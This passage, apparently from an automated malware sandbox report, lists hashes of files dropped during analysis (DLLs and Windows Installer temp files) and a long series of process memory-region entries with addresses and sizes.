                                                                                                                                  9d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e

                                                                                                                                  SHA512

                                                                                                                                  f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd

                                                                                                                                • \Users\Admin\AppData\Local\Temp\is-R0UNB.tmp\idp.dll
                                                                                                                                  MD5

                                                                                                                                  8f995688085bced38ba7795f60a5e1d3

                                                                                                                                  SHA1

                                                                                                                                  5b1ad67a149c05c50d6e388527af5c8a0af4343a

                                                                                                                                  SHA256

                                                                                                                                  203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

                                                                                                                                  SHA512

                                                                                                                                  043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

                                                                                                                                • \Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
                                                                                                                                  MD5

                                                                                                                                  858c99cc729be2db6f37e25747640333

                                                                                                                                  SHA1

                                                                                                                                  69070df2849c1373fae9a4b4a884f14fd8ae39f1

                                                                                                                                  SHA256

                                                                                                                                  d4f839922c901906f549c687ccc58a010861a6a006a15c32e1a7f2e3d703b4d9

                                                                                                                                  SHA512

                                                                                                                                  f53e00bbedba0edbc363589a2be76ac836915b95d8e887bf5ee4080f34d773a19d9dd43e715569ea21f85a9434de2a16b51c52b00afd89d268bfc929e1e8e695

                                                                                                                                • \Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
                                                                                                                                  MD5

                                                                                                                                  858c99cc729be2db6f37e25747640333

                                                                                                                                  SHA1

                                                                                                                                  69070df2849c1373fae9a4b4a884f14fd8ae39f1

                                                                                                                                  SHA256

                                                                                                                                  d4f839922c901906f549c687ccc58a010861a6a006a15c32e1a7f2e3d703b4d9

                                                                                                                                  SHA512

                                                                                                                                  f53e00bbedba0edbc363589a2be76ac836915b95d8e887bf5ee4080f34d773a19d9dd43e715569ea21f85a9434de2a16b51c52b00afd89d268bfc929e1e8e695

                                                                                                                                • \Windows\Installer\MSI26A3.tmp
                                                                                                                                  MD5

                                                                                                                                  07df9ca625c2cb953b2a7f7f699cee7c

                                                                                                                                  SHA1

                                                                                                                                  3225e84b51ba76eb650231c94231b70b70b997c9

                                                                                                                                  SHA256

                                                                                                                                  265d462e9bd3fc4bdf925590a852707a52e0707407fdc4ba40a468542e8dbb77

                                                                                                                                  SHA512

                                                                                                                                  104a32900ac3f7a3815ce4670aa430677eb48bd3b8a5e17f0a05c333b8faf776756408784c8191ea51ffd54ad52d7fcbf2611570a275efdc6bf1b04b5706f9fd

                                                                                                                                • \Windows\Installer\MSI2BB5.tmp
                                                                                                                                  MD5

                                                                                                                                  d07ddd437009ebb9c21882579bf2df0d

                                                                                                                                  SHA1

                                                                                                                                  a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                                                                  SHA256

                                                                                                                                  c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                                                                  SHA512

                                                                                                                                  8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                                                                • \Windows\Installer\MSI2C72.tmp
                                                                                                                                  MD5

                                                                                                                                  d07ddd437009ebb9c21882579bf2df0d

                                                                                                                                  SHA1

                                                                                                                                  a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                                                                  SHA256

                                                                                                                                  c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                                                                  SHA512

                                                                                                                                  8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                                                                • \Windows\Installer\MSI2D7C.tmp
                                                                                                                                  MD5

                                                                                                                                  d07ddd437009ebb9c21882579bf2df0d

                                                                                                                                  SHA1

                                                                                                                                  a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                                                                  SHA256

                                                                                                                                  c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                                                                  SHA512

                                                                                                                                  8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                                                                • \Windows\Installer\MSI2E39.tmp
                                                                                                                                  MD5

                                                                                                                                  d07ddd437009ebb9c21882579bf2df0d

                                                                                                                                  SHA1

                                                                                                                                  a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                                                                  SHA256

                                                                                                                                  c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                                                                  SHA512

                                                                                                                                  8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                                                                • \Windows\Installer\MSI2F92.tmp
                                                                                                                                  MD5

                                                                                                                                  07df9ca625c2cb953b2a7f7f699cee7c

                                                                                                                                  SHA1

                                                                                                                                  3225e84b51ba76eb650231c94231b70b70b997c9

                                                                                                                                  SHA256

                                                                                                                                  265d462e9bd3fc4bdf925590a852707a52e0707407fdc4ba40a468542e8dbb77

                                                                                                                                  SHA512

                                                                                                                                  104a32900ac3f7a3815ce4670aa430677eb48bd3b8a5e17f0a05c333b8faf776756408784c8191ea51ffd54ad52d7fcbf2611570a275efdc6bf1b04b5706f9fd

                                                                                                                                • \Windows\Installer\MSI304E.tmp
                                                                                                                                  MD5

                                                                                                                                  5a25fb13ed470b77eefd2eb89cb62c47

                                                                                                                                  SHA1

                                                                                                                                  3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

                                                                                                                                  SHA256

                                                                                                                                  0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

                                                                                                                                  SHA512

                                                                                                                                  2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

                                                                                                                                • memory/68-259-0x0000027FAC210000-0x0000027FAC280000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/340-271-0x0000026116740000-0x00000261167B0000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/800-114-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/904-131-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/904-128-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/1012-368-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/1036-252-0x00000180BE550000-0x00000180BE5C0000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1096-253-0x0000029F00770000-0x0000029F007E0000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1180-275-0x0000026034FB0000-0x0000026035020000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1376-286-0x000002AD6F400000-0x000002AD6F470000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1428-264-0x000001F56A200000-0x000001F56A270000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1808-207-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/1868-170-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/1908-270-0x000001430C400000-0x000001430C470000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1992-156-0x00000000007E5000-0x00000000007E7000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/1992-151-0x00000000007E4000-0x00000000007E5000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/1992-150-0x00000000007E2000-0x00000000007E4000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/1992-146-0x00000000007E0000-0x00000000007E2000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/1992-143-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/2076-149-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/2228-369-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/2476-344-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/2540-137-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/2540-147-0x0000000000894000-0x0000000000895000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/2540-141-0x0000000000890000-0x0000000000892000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/2568-326-0x0000000000DC0000-0x0000000000DD7000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  92KB

                                                                                                                                • memory/2576-244-0x00000154C7C10000-0x00000154C7C5B000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  300KB

                                                                                                                                • memory/2576-247-0x00000154C7CD0000-0x00000154C7D40000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/2608-242-0x000002209B490000-0x000002209B500000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/2644-325-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/2756-260-0x0000028AEBFA0000-0x0000028AEC010000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/2836-291-0x000001B333A40000-0x000001B333AB0000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/2852-289-0x000001D2CBB40000-0x000001D2CBBB0000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/3032-173-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/3384-123-0x0000000002830000-0x0000000002832000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/3384-120-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/3424-124-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/3424-126-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  88KB

                                                                                                                                • memory/3508-365-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/3508-367-0x0000000006FE0000-0x0000000006FE1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/3740-119-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/3740-116-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/3824-136-0x0000000002FC0000-0x0000000002FC2000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/3824-132-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4124-218-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4204-296-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4272-157-0x0000000002330000-0x0000000002332000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/4272-152-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4272-178-0x0000000002334000-0x0000000002335000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4404-155-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4432-359-0x0000000000D80000-0x0000000000D81000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4432-362-0x0000000000D83000-0x0000000000D84000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4432-360-0x0000000000D82000-0x0000000000D83000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4432-357-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4484-342-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4528-246-0x0000000004C40000-0x0000000004C9C000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  368KB

                                                                                                                                • memory/4528-224-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4528-241-0x0000000004B3E000-0x0000000004C3F000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.0MB

                                                                                                                                • memory/4532-230-0x00007FF7AA864060-mapping.dmp
                                                                                                                                • memory/4532-310-0x000001AED1F00000-0x000001AED2001000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.0MB

                                                                                                                                • memory/4532-265-0x000001AECF870000-0x000001AECF8E0000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/4540-182-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4564-221-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4572-158-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4612-164-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/4612-159-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4612-165-0x0000000000540000-0x000000000068A000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.3MB

                                                                                                                                • memory/4624-193-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4776-162-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4836-324-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4868-187-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4876-356-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4896-201-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5064-169-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5076-311-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5164-339-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5172-237-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5204-297-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5292-318-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  40.0MB

                                                                                                                                • memory/5292-298-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5292-316-0x00000000048D0000-0x0000000004961000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  580KB

                                                                                                                                • memory/5296-306-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5368-299-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5420-347-0x0000000007980000-0x0000000007981000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5420-309-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5420-358-0x0000000000B23000-0x0000000000B24000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5420-346-0x0000000007B40000-0x0000000007B41000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5420-345-0x00000000076F0000-0x00000000076F1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5420-343-0x0000000007330000-0x0000000007331000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5420-341-0x00000000072B0000-0x00000000072B1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5420-340-0x00000000071D0000-0x00000000071D1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5420-338-0x00000000071A0000-0x00000000071A1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5420-333-0x0000000000B22000-0x0000000000B23000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5420-327-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5420-330-0x00000000064B0000-0x00000000064B1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5420-331-0x0000000000B20000-0x0000000000B21000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5420-332-0x0000000006B20000-0x0000000006B21000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5440-302-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5568-305-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5576-303-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5624-334-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5624-335-0x0000000010000000-0x0000000010116000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.1MB

                                                                                                                                • memory/5624-304-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5628-280-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5728-285-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5820-288-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5876-292-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5912-293-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5920-319-0x0000000002040000-0x000000000204C000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  48KB

                                                                                                                                • memory/5920-307-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5996-294-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/6004-355-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/6020-314-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  48KB

                                                                                                                                • memory/6020-315-0x0000000000402F68-mapping.dmp
                                                                                                                                • memory/6024-312-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/6024-320-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/6024-321-0x0000000000770000-0x0000000000782000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  72KB

                                                                                                                                • memory/6032-361-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/6032-363-0x00000000047C0000-0x00000000047C1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/6032-364-0x00000000047C2000-0x00000000047C3000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/6032-366-0x00000000047C3000-0x00000000047C4000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/6060-313-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/6088-323-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/6104-322-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/6108-295-0x0000000000000000-mapping.dmp